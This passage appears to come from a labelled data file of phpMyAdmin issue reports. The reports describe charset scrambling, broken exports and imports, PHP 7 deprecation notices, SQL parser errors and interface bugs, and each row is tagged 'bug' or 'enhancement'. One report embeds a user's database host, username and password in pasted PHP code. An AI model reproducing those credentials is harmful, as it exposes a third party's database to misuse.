does this, in order drops the temp table qryEmail if it exists creates 2 temp tables one for each T bird email type table 1 contact ID and primary email table 2 contact ID and secondary email creates a temp table qryEmail) that includes contact ID, primary email, secondary email drops the first two email temp tables drops the temp table qryPhone if it exists creates 5 temp tables one for each T bird phone type table 1 contact ID work phone table 2 contact ID home phone table 3 contact ID fax number table 4 contact ID pager table 5 contact ID cell creates a temp table qryPhone) that includes contact ID, work, home, fax, pager, cell drops the first 5 phone temp tables drops the temp table qryAddress if it exists creates 2 temp tables one for each T bird address type table 1 contact ID and home address table 2 contact ID and work address creates a temp table qryAddress) that includes contact ID, home address fields, work address fields drops the first 2 address temp tables drops the temp table qryWeb if it exists creates 2 temp tables one for each T bird URL type table 1 contact ID and home URL table 2 contact ID and work URL creates a temp table qryWeb) that includes contact ID, home URL, work URL drops the first 2 web URL) tables SELECTS from remaining temp tables, 1people, and 1organization to create the final Thunderbird flat file SELECT 1people.FirstName AS `First Name` , 1people.LastName AS `Last Name` , CONCAT 1people.LastName, , , 1people.FirstName ) AS `Display Name` , CONCAT LEFT 1people.LastName, 3 ) , LEFT 1people.FirstName, 3 ) ) AS `Nickname` , qryEmail.PrimaryEmail AS `Primary Email` , IF qryEmail.SecondaryEmail IS NULL , , qryEmail.SecondaryEmail ) AS `Secondary Email` , IF qryPhone.WorkPhone IS NULL , , qryPhone.WorkPhone ) AS `Work Phone` , IF qryPhone.HomePhone IS NULL , , qryPhone.HomePhone ) AS `Home Phone` , IF qryPhone.FaxNumber IS NULL , , qryPhone.FaxNumber ) AS `Fax Number` , IF qryPhone.PagerNumber IS NULL , , qryPhone.PagerNumber ) AS `Pager Number` , IF qryPhone.MobileNumber IS NULL , , qryPhone.MobileNumber ) AS `Mobile Number` , IF qryAddress.HomeAddress IS NULL , , qryAddress.HomeAddress ) AS `Home Address` , IF 1 =1, , ) AS `Home Address 2` , IF qryAddress.HomeCity IS NULL , , qryAddress.HomeCity ) AS `Home City` , IF qryAddress.HomeState IS NULL , , qryAddress.HomeState ) AS `Home State` , IF qryAddress.HomeZip IS NULL , , qryAddress.HomeZip ) AS `Home ZipCode` , IF qryAddress.HomeCountry IS NULL , , qryAddress.HomeCountry ) AS `Home Country` , IF qryAddress.WorkAddress IS NULL , , qryAddress.WorkAddress ) AS `Work Address` , IF 1 =1, , ) AS `Work Address 2` , IF qryAddress.WorkCity IS NULL , , qryAddress.WorkCity ) AS `Work City` , IF qryAddress.WorkState IS NULL , , qryAddress.WorkState ) AS `Work State` , IF qryAddress.WorkZip IS NULL , , qryAddress.WorkZip ) AS `Work ZipCode` , IF qryAddress.WorkCountry IS NULL , , qryAddress.WorkCountry ) AS `Work Country` , IF 2workinfo.PriLvl =1, 2workinfo.JobTitle, ) AS `Job Title` , IF 2workinfo.PriLvl =1, 2workinfo.Department, ) AS Department, IF 2workinfo.PriLvl =1, 2workinfo.OrgID, ) AS Organization, IF qryWeb.WorkWeb IS NULL , , qryWeb.WorkWeb ) AS `Web Page 1` , IF qryWeb.PersonalWeb IS NULL , , qryWeb.PersonalWeb ) AS `Web Page 2` , 1people.BirthYear AS `Birth Year` , 1people.BirthMonth AS `Birth Month` , 1people.BirthDay AS `Birth Day` , IF 1 =1, , ) AS `Custom 1` , IF 1 =1, , ) AS `Custom 2` , IF 1 =1, , ) AS `Custom 3` , IF 1 =1, , ) AS `Custom 4` , 1people.Notes FROM 1people LEFT JOIN qryEmail ON 1people.PersonID = qryEmail.PersonID LEFT JOIN qryPhone ON 1people.PersonID = qryPhone.PersonID LEFT JOIN qryAddress ON 1people.PersonID = qryAddress.PersonID LEFT JOIN 2workinfo ON 1people.PersonID = 2workinfo.PersonID LEFT JOIN qryWeb ON 1people.PersonID = qryWeb.PersonID WHERE qryEmail.PrimaryEmail != AND 1people.Category = Family OR 1people.Category = Friends ) GROUP BY 1people.LastName, 1people.FirstName; Rows 97 The query works with MySQL Query Browser.
However, when I run the query with phpMyAdmin, I get Rows 97 , but none of them show up on the screen.
If there is a better way to accomplish my objective a flat file Mozilla Thunderbird addressbook export from my contacts database), I m open to suggestions!
Original URL https sourceforge.net p phpmyadmin bugs 1579 https sourceforge.net p phpmyadmin bugs 1579 Original author hplsbyufan Found in version Latest Git","bug"
"24444","11357","Wrong character set in spanish translation.
at the login screen i choose Spanish iso 8859 1) as my language, then i log in.
if you look at the source code of the index.php THROUGH the browser, you get the following tag lt;meta http equiv= Content Type content= text html; charset=utf 8 gt; so the charset is still utf 8 I continue by selecting a DB, everything going fine... Then i click on the EXIT button, returning to the login screen index.php?db=bd1 old usr=root).
The laguage selection combo displays Spanish utf 8), I switch it back to spanish iso 8859 1) and log in again, source code still says lt;meta http equiv= Content Type content= text html; charset=utf 8 gt;, but, everything containing the characters xc3x81 xc3x9a xc3xa1 xc3xba and xc3x91xc3xb1 gets scrambled on screen like Acci?
Action) Tama?th gt; size) N?
de filas Row count) Vista de impresi?a gt; Print preview) I suggest using the command htmlentities ) on every text which comes from a translation Original URL https sourceforge.net p phpmyadmin bugs 2054 https sourceforge.net p phpmyadmin bugs 2054 Original author technomike Found in version 2.8.0 rc2","bug"
"24444","11358","utf8mb4 fields show only ???
?s for 4 byte Unicode characters after import.
The export dialog is missing the option to export for utf8mb4.
While the utf8 option creates a valid utf8 file, this !40101 SET NAMES utf8 ; should read !40101 SET NAMES utf8mb4 ; for utf8mb4 exports.
A manual change shows that it works.
Steps to reproduce 1.
Create new database with utf8mb4 general ci collation.
2.
Create new table with a varchar column 3.
Insert a smiley like this ?
4.
Export the database or table 5.
Import the database or table 6.
Look at the smiley.
You ll see four question marks.
7.
Now change utf8 to utf8mb4 in the SQL file 8.
Import again 9.
Look at the smiley.
It was correctly imported.
Original URL https sourceforge.net p phpmyadmin bugs 4936 Original author patrick246 Found in version 4.4.8","bug"
"24444","11360","errors given when I try to browse next set of 30 rows.
I am using Windows XP MySQL Ver.
11.18 Distrib 3.23.55 PHP Version 4.3.1 phpMyAdmin; 2.4.0 When I browse the first 30 rows of a MySQL db everthing is fine.
When I try to browse the next 30 rows I get the following errors Either Page Not Found Error or This error can be duplicated... Notice Undefined variable sql query in H \phpMyAdmin\sql.php on line 48 Notice Undefined variable sql query in H \phpMyAdmin\sql.php on line 86 Notice Undefined index len in H \phpMyAdmin\libraries\sqlparser.lib.php on line 633 Notice Undefined index len in H \phpMyAdmin\libraries\sqlparser.lib.php on line 1429 Notice Undefined offset 0 in H \phpMyAdmin\libraries\sqlparser.lib.php on line 1435 Notice Undefined variable db in H \phpMyAdmin\sql.php on line 274 Warning Cannot modify header information headers already sent in H \phpMyAdmin\libraries\ob.lib.php on line 65 Warning Cannot modify header information headers already sent in H \phpMyAdmin\header.inc.php on line 27 Warning Cannot modify header information headers already sent in H \phpMyAdmin\header.inc.php on line 28 Warning Cannot modify header information headers already sent in H \phpMyAdmin\header.inc.php on line 29 Warning Cannot modify header information headers already sent in H \phpMyAdmin\header.inc.php on line 30 Warning Cannot modify header information headers already sent in H \phpMyAdmin\header.inc.php on line 32 Server localhost Error MySQL said Query was empty Back If you need more info to help me please ask.
Thanks in advance for your assistance in this matter.
With Warmest Regards, jtbutler Original URL https sourceforge.net p phpmyadmin support requests 226 https sourceforge.net p phpmyadmin support requests 226 Original author jtbutler Found in version 2.4.0","bug"
"24444","11361","Big problem exporting table with blob fields.
This was tested with versions 2.6.4.pl1, 2.6.4.pl2, 2.8.0.2 and 2.8.0.3 There are problems depending on the configuration of the parameter cfg[ AllowAnywhereRecoding ].
I HAVE TO set this parameter to true because I m a Spanish speaking person and my customers use Spanish in the content of their databases.
If you try to export import data from to a table with PMA) that uses fields defined as BLOB then you are in BIG TROUBLE.
Bellow there is a detailed explanation of the problems I found when the option is set to either of the options, true or false 1st.
Case Export data as a SQL file Set the cfg[ AllowAnywhereRecoding ] to FALSE In this case the file has all the accented characters or the tilde characters like xc3x91 xc3xb1) translated into weird things.
Set the cfg[ AllowAnywhereRecoding ] to TRUE After the download is complete the output file DOES NOT in certain cases, see note at the end) contain the whole set of fields defined for the table.
In this case, and after fixing manually the records that were not complete, when you try to upload import) the data back to the file which is empty) you get an error that displays the data for the first record and at the end the message xe2x80x9cxe2x80x9c 1062 Duplicate entry 2003 1 for key 1xe2x80x9dxe2x80x9d.
2nd.
Case Export data as a LaTeX file Set the cfg[ AllowAnywhereRecoding ] to FALSE I really donxe2x80x99t know which the format for this kind of file is but the size of the resulting file is very small.
Set the cfg[ AllowAnywhereRecoding ] to TRUE The output file is very small and looking into it you find only the definition of the table fields plus ONLY one record that does not seem to be complete.
3rd.
Case Export data as a Pdf file Set the cfg[ AllowAnywhereRecoding ] to FALSE After a very long time, it takes forever, the size of the resulting file is very small and xe2x80x93logically when you try to open it in the reader you get a message back stating that the file is bad.
Set the cfg[ AllowAnywhereRecoding ] to TRUE Also like stated before, after a very long time, it takes forever, the size of the resulting file is very small and xe2x80x93logically when you try to open it in the reader you get a message back stating that the file is bad.
4th.
Case Export data as a Microsoft Excel 2000 file Set the cfg[ AllowAnywhereRecoding ] to FALSE The Resulting file could not be opened either in Excel nor OpenOffice.org.calc they get cancelled).
Set the cfg[ AllowAnywhereRecoding ] to TRUE The file is very small, I could open it using both Excel and OpenOffice.org.calc and only has the data up to but not including) the first blob field.
5th.
Case Export data as a Microsoft Word 2000 file Set the cfg[ AllowAnywhereRecoding ] to FALSE The Resulting file could not be opened either in Excel nor OpenOffice.org.writer they get cancelled).
Set the cfg[ AllowAnywhereRecoding ] to TRUE The file is very small, I could open it using both Word and OpenOffice.org.writer and only has the data up to but not including) the first blob field.
6th.
Case Export data as a CSV for MS Excel file Set the cfg[ AllowAnywhereRecoding ] to FALSE The Resulting file is very small, has all the records, the blob fields are not exported and the accented or special characters are wrong.
Set the cfg[ AllowAnywhereRecoding ] to TRUE The file is very small, has all the records in just one line and the data is up to but not including) the first blob field.
7th.
Case Export data as a CSV file Set the cfg[ AllowAnywhereRecoding ] to FALSE The Resulting file seems to be correct BUT, when you try to import back the data to the table you get a message back from PMA stating xe2x80x9cxe2x80x9cInvalid field count in CSV input on line 1xe2x80x9dxe2x80x9d.
Set the cfg[ AllowAnywhereRecoding ] to TRUE The file is very small, has all the records in just one line and the data is up to but not including) the first blob field.
NOTE CONCERNING TEXT FIELDS WITH SOME SPECIAL CHARACTERS THIS IS VERY STRANGE In the table there is one field which contents is something plus Montoya ) that is blank short dash NOT DASH the word Montoya short dash NOT DASH blank), in this case the record gets truncated after the first dash and there is no more data for that record.
Strange no).
One more thing, if you do an edit of this record you will notice that the two SHORT DASHES are not shown.
Also if you use the Ellipsis) character, the record also gets truncated up to but not including the ellipsis.
NOTE CONCERNING IExplorer HTML WARNINGS.
After the execution of any option within the export screen) if you try to select another option and you have set the options to debug HTML errors) you get an error and, to be able to redo the command with another option, you have to reload the page.
The error is something like xe2x80x9cThere has occurred an error at execution time, do you want to debug it?xe2x80x9d my translation.
This error does not show using Firefox.
Some more clarification of my problems.
Please note that if you go to the bellow link, youxe2x80x99ll be able to see the record content for the problem about Montoya ), and you can notice that the short dash are well displayed.
http www.websprogrammer.com WebsProgrammer F1 F1DetailCircuit.php?Year=2006 Circuit=16 If you want a result of the different exported files just go to this link http www.websprogrammer.com PmaProblems ExportProblem.zip The file will be there till April 18, 2006 I suppose 8 days is enough time for you to get it.
Each of the zipped files has a name in accordance with the selected option for the export operation intended.
Original URL https sourceforge.net p phpmyadmin bugs 2105 https sourceforge.net p phpmyadmin bugs 2105 Original author yacar suscri","bug"
"24444","11362","Irregularity in row count error nuisance).
I get this message back after doing an Import 1366 Incorrect integer value for column Sequence at row 1.
The problem is that the row count is not 1 but something else depending of what the row count really is.
This is a small bug, but a little bit misleading to Us the Users in reference that it guides you to look to your first import row when really the problem row is somewhere else in the file.
Before you tell me that the query is wrong, I know that, it is a problem of Microsoft Excel when you have formulas in some cells, their result is blank rows with only separators, and it creates a csv file with those rows with no values.
I m using, Windows XP SP2, Apache 2.2.8, Php 5.2.5, MySql Server version 5.0.45 community nt, client version 5.0.45 and PhpMyAdmin version 2.11.5.1 An extract of the file used for the import DvdServices;99;1;Banners;;;0;0;;0000 00 00;A;;;;;;;;;;;;;;;;;0;0;Indicator if this section is Active or Inactive DvdServices;99;2;Banners;1;;0;0;;0000 00 00;A;;;;;;;;;;;;;;;;;0;0;How Many Images?
DvdServices;99;3;Banners;bgCreme;;0;0;;0000 00 00;A;;;;;;;;;;;;;;;;;0;0;Do we want a Background color?
DvdServices;99;4;Banners;Double;;0;0;;0000 00 00;A;;;;;;;;;;;;;;;;;0;0;Do we want border for this section and what type?
DvdServices;99;5;Banners;LinkExternal;;0;0;;0000 00 00;A;Haga clic aquxc3xad para ver nuestros programas de Publicidad;Click here to se our Publicity Programs;;;images;Banners;Pronosticadores;;;publicidad 110x180.jpg;;;;;;body publicidad.htm;110;180;N A ;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;; The full PhpMyAdmin message reads REPLACE INTO `Specials` VALUES , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ) MySQL said Documentation 1366 Incorrect integer value for column Sequence at row 1 Oh by the way, before you tell me to search first so not to duplicate another report I did the following searches at row = NO MATCHES), row count import = NO MATCHES), row count = All bugs area closed and Older than 60 days), 1366 Incorrect integer value = NO MATCHES), 1366 = NO MATCHES), and Incorrect integer value = NO MATCHES).
Original URL https sourceforge.net p phpmyadmin bugs 2669 https sourceforge.net p phpmyadmin bugs 2669 Original author yacar suscri","bug"
"24444","11364","JS error when trying to navigate to db structure page after db creation failed.
Found in version 4.4.12 and reported in https reports.phpmyadmin.net reports view 12355.
Do not try to navigate to the database structure page when database creation has in fact failed.","bug"
"24444","11367","Export after search, missing WHERE clause.
When you use the Search panel, and the phpmyadmin shows only one record, then push the export button bellow choose view output as text option, don s download the sql ).
Normally this is return the selected filtered records.
In this active 4.4.12) version, the phpmyadmin returned the all records, without any filter.","bug"
"24444","11368","SQL error when importing phpMyAdmin dump file.
phpMyAdmin 4.4.13 generates an SQL error when importing from a phpMyAdmin dump file.
1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near CLIENT= OLD CHARACTER SET CLIENT at line 1 The same dump file imports without problem in 4.4.12.","bug"
"24444","11376","master) after a With selected > Drop , tables still listed.
On database Structure, tick one table, then With selected > Drop and confirm.
The table is still listed.","bug"
"24444","11377","Random 502 errors only with phpMyAdmin, with php segfault.
I m using nginx and php fpm on many servers.
Some have php 5.4 with APC and others 5.5 or 5.6 with opcache.
PhpMyAdmin on servers on 5.4 work without any problems.
PhpMyAdmin on servers on 5.5 or 5.6 throw 502 errors randomly.
All websites hosted on these servers are working well and doesn t throw 502 error.
By randomly I mean that I can reload the same ajax request multiple times and it will fail or success absolutely randomly.
I tested by disabling opcache for phpMyAdmin but it doesn t chaneg anything.
Here are some nginx error logs 2015 08 09 23 45 12 [error] 8386 8386 8 recv ) failed 104 Connection reset by peer) while reading response header from upstream, client XX.XX.XX.XX, server phpmyadmin.host.com, request GET js get scripts.js.php?scripts 5B 5D=jquery jquery.uitablefilter.js scripts 5B 5D=gis data editor.js scripts 5B 5D=multi column sort.js scripts 5B 5D=makegrid.js scripts 5B 5D=sql.js call done=1 HTTP 1.1 , upstream fastcgi unix var run php5 fpm.sock , host phpmyadmin.host.com , referrer https phpmyadmin.host.com 2015 08 09 23 46 04 [error] 8386 8386 6 recv ) failed 104 Connection reset by peer) while reading response header from upstream, client XX.XX.XX.XX, server phpmyadmin.host.com, request GET phpinfo.php HTTP 1.1 , upstream fastcgi unix var run php5 fpm.sock , host phpmyadmin.host.com As you can see, even the phpinfo from phpMyAdmin is sometimes gettong on 502 In the PHP FPM log, I got segfaults for each 502 error.
Here as one [09 Aug 2015 23 46 04] WARNING [pool www] child 6965 exited on signal 11 SIGSEGV) after 372.815678 seconds from start [09 Aug 2015 23 46 04] NOTICE [pool www] child 9104 started Finally, the configuration used nginx site server { listen 443 ssl; listen [ ] 443 ssl; ssl certificate etc ssl certs phpmyadmin.pem; ssl certificate key etc ssl private phpmyadmin.key; server name phpmyadmin.host.com; root home var www phpmyadmin ; location \.php { expires off; include fastcgi params; fastcgi index index.php; fastcgi split path info ?U).
\.php) ?. )
; fastcgi param PATH INFO fastcgi path info; fastcgi param PATH TRANSLATED document root fastcgi path info; fastcgi param SCRIPT FILENAME document root fastcgi script name; fastcgi pass unix var run php5 fpm.sock; fastcgi buffers 8 16k; fastcgi buffer size 32k; fastcgi connect timeout 300; fastcgi send timeout 300; fastcgi read timeout 300; fastcgi param PHP VALUE max execution time=360 \n memory limit=500M \n post max size=40M \n upload max filesize=20M \n opcache.enable=0 ; } location \.
{ deny all; } access log var log nginx phpmyadmin access.log; error log var log nginx phpmyadmin error.log; } php fpm [www] pm.max children = 50 pm.start servers = 10 pm.min spare servers = 5 pm.max spare servers = 10 listen.owner = www data listen.group = www data listen.mode = 0660 phpMyadmin config.inc.php <?php Servers configuration i = 0; cfg[ blowfish secret ] = a 32 char long secret here ; Server localhost [1] i ; cfg[ Servers ][ i][ verbose ] = ; cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ port ] = ; cfg[ Servers ][ i][ socket ] = ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ auth type ] = http ; cfg[ Servers ][ i][ user ] = root ; cfg[ Servers ][ i][ password ] = ; End of servers configuration cfg[ DefaultLang ] = en ; cfg[ ServerDefault ] = 1; cfg[ UploadDir ] = ; cfg[ SaveDir ] = ; cfg[ ShowPhpInfo ] = true; regarding the others php extensions I m using debian packages with dotdeb to install them.
Extensions included opcache but disabled for phpMyadmin host) pdo apcu curl gd imap intl mcrypt mysqli mysql pdo mysql pdo pgsql pdo sqlite pgsql readline sqlite3 Do you have any idea what could cause this problem?
Let me know if you need more informations.","bug"
"24444","11380","Incomplete message after import.
Seen in 4.4 after an import of a selected file, the filename is not shown between the parentheses at the end.","bug"
"24444","11381","Icons dont resize when using Font Size > 200 .
I have a 4k display.
I use phpMyAdmin s Font Size 263 But the icons did non resize correctly see screenshot) !
[image] https cloud.githubusercontent.com assets 10342708 9176132 d3e87d8e 3f89 11e5 95d0 1c86da619cba.png)","bug"
"24444","11382","Selecting values for set field throws JS error.
This happens in current master.
To recreate, try to insert a row to the sakila.film table with values for special features column.
When you select a value a JS error is thrown.","bug"
"24444","11383","Query format.
Sample query that formatted wrong `SELECT FROM table WHERE row != 1` `!=` this changes to `!
=` with a space) Version information 4.5.0 dev, latest stable version 4.4.13.1","bug"
"24444","11385","Refactor libraries db info.inc.php.
It would be cleaner to put this code inside a function probably in Util.class.php) that would return an array containing all of the globals that it sets except for temporary stuff).","enhancement"
"24444","11386","Cannot import database with long data in one column.
When trying to import a database which has too long data in one column so SQL query is too big), phpMyAdmin ends taking 100 CPU and, after a while, this error appears 2006 MySQL server has gone away max allowed packet = 2097152 wait timeout = 120","bug"
"24444","11387","phpseclib < 2.0 produces deprecated messages on PHP 7.
We are using phpseclib < 2.0.
I contacted one of their developers who told me that we could try https github.com phpseclib phpseclib tree 2.0 which does use construct ).
However, due to it being namespace d, the API is slightly different.
Target for this should be QA 4 4 because we have to be ready for PHP 7.","bug"
"24444","11389","ReCaptcha produce deprecated messages under PHP 7.
Possible solution https github.com google recaptcha.
In their current master there are more than one file to implement the full logic and in the newer ReCaptcha.php they now use the proper construct ) which should get rid of the deprecated message.
Watch for API changes but they have examples.
Target QA 4.4","bug"
"24444","11392","Support high resolution displays.
We should support high resolution displays, such as the 4k display mentioned at 11381.
Primarily we should worry about icon size and resolution; a user can use their browser s zoom feature to change text size but the icon resolution will suffer.
Briefly discussed at https wiki.phpmyadmin.net pma 2015 08 Meeting","enhancement"
"24444","11394","Export import Designer view.. 1.
When you export a db, the current view of the table arrangement and relationships in the Designer tab should be saved.
2.
When importing the same db onto another computer, the Designer tab should be populated by default.
You should NOT have to Show hide table list, or rearrange all of the tables.
It should look exactly like it did on the original computer.","enhancement"
"24444","11396","Error when creating a new db.
New db is created, but getting this stack trace.
Notice in .
libraries navigation Nodes Node Database.class.php 386 Undefined index navigationhiding Backtrace .
libraries navigation NavigationTree.class.php 566 Node Database >getHiddenItems string group ) .
libraries navigation NavigationTree.class.php 342 PMA NavigationTree > addDbContainers object, string , integer 0, ) .
libraries navigation NavigationTree.class.php 298 PMA NavigationTree > buildPathPart array, string , string , string , string , ) .
libraries navigation NavigationTree.class.php 866 PMA NavigationTree > buildPath ) .
libraries navigation Navigation.class.php 50 PMA NavigationTree >renderPath ) .
navigation.php 75 PMA Navigation >getDisplay )","bug"
"24444","11397","New parser and partitions.
Try this in the SQL panel .
An error on line 2 is incorrectly returned.","bug"
"24444","11398","SQL lint doesn t recognize `SERIAL`.
Pasting this SQL statement in the SQL tab results in a lint warning about `Unrecognized data type.
near SERIAL)` CREATE TABLE `test` `id` SERIAL);","bug"
"24444","11399","Illegal offset type.
Using the git master branch Open a db, click on Tracking.
In the list of untracked table, click on Track table next on one table name .
git bisect tells me that the culprit is 66361530713fcf99b9e090b82ccd016dc3c287b2","bug"
"24444","11400","Copy table to another database gives Class name error.
Trying to copy a table to another database in current git master) I get this error in my Apache error log > [Wed Aug 12 13 39 10.714178 2015] [ error] [pid 5993] [client 192.168.56.1 58968] PHP Fatal error Class name must be a valid object or a string in var www pma dev fork libraries sql parser src Statements AlterStatement.php on line 131, referer http 192.168.56.102 pma dev fork tbl operations.php?db=sakila table=country token=af334d4161046c0078199f78dfa1bb7e > [Wed Aug 12 13 39 10.714275 2015] [ error] [pid 5993] [client 192.168.56.1 58968] PHP Stack trace , referer http 192.168.56.102 pma dev fork tbl operations.php?db=sakila table=country token=af334d4161046c0078199f78dfa1bb7e > [Wed Aug 12 13 39 10.714296 2015] [ error] [pid 5993] [client 192.168.56.1 58968] PHP 1.
{main} ) var www pma dev fork tbl operations.php 0, referer http 192.168.56.102 pma dev fork tbl operations.php?db=sakila table=country token=af334d4161046c0078199f78dfa1bb7e > [Wed Aug 12 13 39 10.714308 2015] [ error] [pid 5993] [client 192.168.56.1 58968] PHP 2.
PMA moveOrCopyTable ) var www pma dev fork tbl operations.php 94, referer http 192.168.56.102 pma dev fork tbl operations.php?db=sakila table=country token=af334d4161046c0078199f78dfa1bb7e > [Wed Aug 12 13 39 10.714319 2015] [ error] [pid 5993] [client 192.168.56.1 58968] PHP 3.
PMA Table moveCopy ) var www pma dev fork libraries operations.lib.php 2099, referer http 192.168.56.102 pma dev fork tbl operations.php?db=sakila table=country token=af334d4161046c0078199f78dfa1bb7e > [Wed Aug 12 13 39 10.714330 2015] [ error] [pid 5993] [client 192.168.56.1 58968] PHP 4.
SqlParser\\Statements\\AlterStatement >build ) var www pma dev fork libraries Table.class.php 989, referer http 192.168.56.102 pma dev fork tbl operations.php?db=sakila table=country token=af334d4161046c0078199f78dfa1bb7e To reproduce, go to a table s operation tab, select another database from the Copy table to database.table) dialog.
I tested with a number of combinations of the settings, but got the error with the default as well.
A 500 error message is shown in browser and full details are in the webserver error log.","bug"
"24444","11404","Switch to copied table doesn t work copying table to new database).
In a table s Operation tab, when copying to a new database there is a checkbox to Switch to copied table.
When selecting that checkbox, the copy is successful but the active database doesn t change.","bug"
"24444","11405","please help to create .php file in phpmyadmin.
please help to create .php file in phpmyadmin","bug"
"24444","11406","Missing quotes after calling distinct values .
Calling distinct values in table structure ...
!
[17 08 2015 13 22 15] https cloud.githubusercontent.com assets 462559 9304032 093f82ac 44e4 11e5 9e49 8a42e1846826.png) ...gives these nice list with distinct values and its counts ...
!
[17 08 2015 13 22 50] https cloud.githubusercontent.com assets 462559 9304094 c5c33838 44e4 11e5 9712 d4472d7b2dd9.png) Click on one of this distinct values should list datasets limited to this distinct value.
This works for numeric data types but not for strings; because the value is not quoted ...
!
[17 08 2015 13 23 11] https cloud.githubusercontent.com assets 462559 9304056 58b5a8d4 44e4 11e5 8998 c07596d40d0b.png)","bug"
"24444","11407","ALTER TABLE failing on import when table exists.
phpMyAdmin SQL Dump version 4.2.12deb2 http www.phpmyadmin.net Host localhost Generation Time Aug 12, 2015 at 10 09 AM Server version 5.6.25 0ubuntu0.15.04.1 PHP Version 5.6.4 4ubuntu6.2 CREATE TABLE IF NOT EXISTS `alert` `alert id` int 11) NOT NULL, `user id` int 11) DEFAULT NULL, `email` varchar 80) DEFAULT NULL ) ENGINE=MyISAM AUTO INCREMENT=29 DEFAULT CHARSET=latin1; .
.
.
ALTER TABLE `alert` ADD PRIMARY KEY `alert id`); If table structure exists ALTER TABLE will fail with duplicate key and the import exits any other modification will not run.
Why not go back to CREATE TABLE with PRIMARY KEY.
CREATE TABLE IF NOT EXISTS `alert` `alert id` int 11) NOT NULL, `user id` int 11) DEFAULT NULL, `email` varchar 80) DEFAULT NULL, PRIMARY KEY `alert id`) ) ENGINE=MyISAM AUTO INCREMENT=29 DEFAULT CHARSET=latin1;","bug"
"24444","11408","Export breaks when field name is 0.
Found in current master.
Try exporting `` CREATE TABLE IF NOT EXISTS `temp` `0` INT 11) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; `` This is exported as `` CREATE TABLE IF NOT EXISTS `temp` `INT` ) ; ``","bug"
"24444","11409","Parse error syntax error.
Parse error syntax error, unexpected T FUNCTION, expecting ) in home u466736518 public html core init.php on line 25 guys help please.
init.php code <?php Created by Chris on 9 29 2014 3 58 PM.
session start ); GLOBALS[ config ] = array mysql => array host => mysql.hostinger.ru , username => u466736518 fles , password => 643350np , db => u466736518 fles ), remember => array cookie name => hash , cookie expiry => 604800 ), sessions => array session name => user , token name => token ) ); spl autoload register function class) { line 25 require once .
classes .
class .
.php ; }); require once .
functions sanitize.php ; if Cookie exists Config get remember cookie name )) !Session exists Config get sessions session name ))) { hash = Cookie get Config get remember cookie name )); hashCheck = DB getInstance ) >get users session , array hash , = , hash)); if hashCheck >count )) { user = new User hashCheck >first ) >user id); user >login ); } }","bug"
"24444","11410","SPATIAL index option is not clickable ).
MySQL 5.7.8 rc log phpMyAdmin 4.4.13.1 column type point The spacial index button is present... but but is not clickable I was able to run the statement `ALTER TABLE myTable ADD SPATIAL INDEX myPointCol);` and see the index appear underneath the table in the indexes section, but the spatial button s appearance did not change","bug"
"24444","11411","escapeHtml bugfix .
phpMyAdmin 4.4.13 still has this problem file js functions.js escapeHtml numeric scalar) raises a undefined replace function exception.
I suggest this fix function escapeHtml unsafe) { if typeof unsafe) != undefined ) { return unsafe.toString ) .replace g, amp; ) .replace < g, lt; ) .replace > g, gt; ) .replace g, quot; ) .replace g, 039; ); } else { return false; } }","bug"
"24444","11412","Wrong redirect from SECURE connection to INSECURE.
phpMyAdmin 4.4.13.1 same on older versions) When i try to open phpMyAdmin via HTTPS link it it opens but on login redirects me to HTTP.
If i set cfg[ ForceSSL ] = true, i get infinite loop of redirects.
Manual switch back to HTTPS by opening right URL) works.
My setup 1.
Front end gateway, handles SSL connection, redirect requests to working server.
SSL end here.
Used nginx.
2.
Back end server, process requests.
phpMyAdmin here.
Obviously no HTTPS here.
Used nginx php fpm.
In such setup if phpMyAdmin didn t try to change protocol say using relative links instead of absolute) all should be fine.
Modern browsers support this https en.wikipedia.org wiki HTTP location","bug"
"24444","11413","9190 inline comments are stripped from stored procedure.
Feature Request I see this was closed... perhaps when moving to github.
Apparently it s poo poo d... but I think it s appropriate for commenting internals of the procedure... not commenting what the procedure does FWIW, MySQL Workbench doesn t strip inline comments","bug"
"24444","11414","unclear export options organization hierarchy.
Object creation options .
if the `CREATE TABLE options` options are truly only for create table, why not place these options directly under Add CREATE TABLE statement ?
Could also eliminate the outer options option checkbox in the process.
Proposed .","enhancement"
"24444","11415","Export table structure same as for 4.1.14 and before.
With PhpMyAdmin 4.3.10 And a little before), an export of a table structure is like this .
With three parts Create table Alter table for primary key Alter table for auto increment.
With PhpMyAdmin 4.1.14 and before), an export of table structure is like this .
With only one query that has all parameters.
Why is it not possible to have the same with PhpMyAdmin 4.3.10 and later?","bug"
"24444","11416","Can t use method return value in write contex.
When opening any Structure tab Git revision 3f307d2 from master branch, committed on Aug 20, 2015 at 09 42 PM by Marc Delisle PHP Fatal error Can t use method return value in write context in var www pma templates table structure display structure.phtml on line 203 while reading response header from upstream, client 192.168.1.3, server , request GET pma tbl structure.php?db=ipt table=likes token=5db63a4b79019b7f4eea945d569ed0e8 ajax request=true ajax page request=true menuHashes=5a8c1f19 a9a1fb3c 5a87c642 9d538f16 5facd218 3c1a247f 11d7332e nocache=1440080166182876548 HTTP 1.1 , upstream fastcgi unix var run php5 fpm.sock , host router , referrer http router pma index.php?= saved=1 token=5db63a4b79019b7f4eea945d569ed0e8","bug"
"24444","11417","After upgrading to 4.4.14 still reports 4.4.13.1 as most recent stable version.. Not a big issue indeed, just for your reference.
Thanks.","bug"
"24444","11421","stored proc routine broken parameter parsing.
I have imported a routine with the following definition .
it appears the execute routine and edit routine modals are attempting to parse the parameter list to display the names of the params `libraries rte rte routines.lib.php`) the params across multiple lines in my test is thwarting the parser and the names appear blank rather than col1, col2, and col3) [MySQL 5.5.3 and above] http dev.mysql.com doc refman 5.5 en parameters table.html) > no parsing necessary .","bug"
"24444","11429","help phpmyadmin 1045 issue,can t link MySQL server.
Dear friends i build a website by dedecms, then i forget the code of phpMyAdmin,it redult in 1045 can t link with MySQL server issue.
and i try to change the code in the file of common.inc.php and config.inc.php as the attachments.But they still lose.
So how could i change or find my code.
Pls tell me detaily by your words and images.
!
[image] https cloud.githubusercontent.com assets 13976302 9486947 c4bfad28 4bff 11e5 94f8 0c27320c7280.png) !
